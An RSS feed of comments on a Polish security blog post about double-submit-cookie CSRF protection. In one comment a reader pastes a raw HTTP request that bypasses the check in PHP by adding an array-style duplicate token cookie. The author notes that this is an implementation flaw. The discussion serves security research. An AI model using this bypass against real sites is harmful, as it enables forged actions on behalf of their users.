Paweł Goleń, blog - Formularz komentarzy "CSRF, double submit cookies i good enough"

Paweł Goleń, blog - Formularz komentarzy "CSRF, double submit cookies i good enough" https://archive.mroczna-zaloga.org/ Paweł Goleń, blog - Zrzędzenie starego zgreda pl Serendipity - http://www.s9y.org/ Sat, 15 Mar 2025 22:14:46 GMT https://archive.mroczna-zaloga.org/templates/bulletproof/img/s9y_banner_small.png RSS: Paweł Goleń, blog - Formularz komentarzy "CSRF, double submit cookies i good enough" - Paweł Goleń, blog - Zrzędzenie starego zgreda https://archive.mroczna-zaloga.org/ 100 21 Paweł Goleń: CSRF, double submit cookies i good enough https://archive.mroczna-zaloga.org/archives/1141-csrf-double-submit-cookies-i-good-enough.html#c8847 https://archive.mroczna-zaloga.org/archives/1141-csrf-double-submit-cookies-i-good-enough.html#comments https://archive.mroczna-zaloga.org/wfwcomment.php?cid=1141 nospam@example.com (Paweł Goleń) Tak, przy czym to jest atak na implementację, a nie na samą metodę ochrony przed CSRF. Dość specyficzny dla PHP, aczkolwiek działający :) Sun, 09 Sep 2012 17:40:38 +0200 https://archive.mroczna-zaloga.org/archives/1141-guid.html#c8847 dariusz: CSRF, double submit cookies i good enough https://archive.mroczna-zaloga.org/archives/1141-csrf-double-submit-cookies-i-good-enough.html#c8846 https://archive.mroczna-zaloga.org/archives/1141-csrf-double-submit-cookies-i-good-enough.html#comments https://archive.mroczna-zaloga.org/wfwcomment.php?cid=1141 nospam@example.com (dariusz) Zrobiłem szybki test i wygląda na to, że jeżeli cookie jest tablicą to PHP ignoruje kolejność i bierze je pod uwagę. Poniższy request zwraca "OK": POST / HTTP/1.1 Host: victim.threats.pl User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en,pl;q=0.7,en-us;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://victim.threats.pl/ Cookie: token=3a2aa8e2f1130ad4968520d7095f7a3ae3d301a2; token[]=csrfdemo; Content-Type: application/x-www-form-urlencoded Content-Length: 24 action=&token[]=csrfdemo Thu, 06 Sep 2012 16:26:26 +0200 https://archive.mroczna-zaloga.org/archives/1141-guid.html#c8846 Piotr Bratkowski: CSRF, double submit cookies i good enough https://archive.mroczna-zaloga.org/archives/1141-csrf-double-submit-cookies-i-good-enough.html#c8554 https://archive.mroczna-zaloga.org/archives/1141-csrf-double-submit-cookies-i-good-enough.html#comments https://archive.mroczna-zaloga.org/wfwcomment.php?cid=1141 nospam@example.com (Piotr Bratkowski) Cześć, Gdzieś w głowie mi się obija, że widziałem tabele w której było opisane jak konkretne web serwery i konkretne języki interpretują np. powtarzające się cookies. Teraz nie mogę tego wyszperać, ale wydaje mi się, że w tym scenariuszu ma do duży wpływ na istnienie/nie istnienie podatności. Pozdr., Piotrek Mon, 03 Sep 2012 09:06:20 +0200 https://archive.mroczna-zaloga.org/archives/1141-guid.html#c8554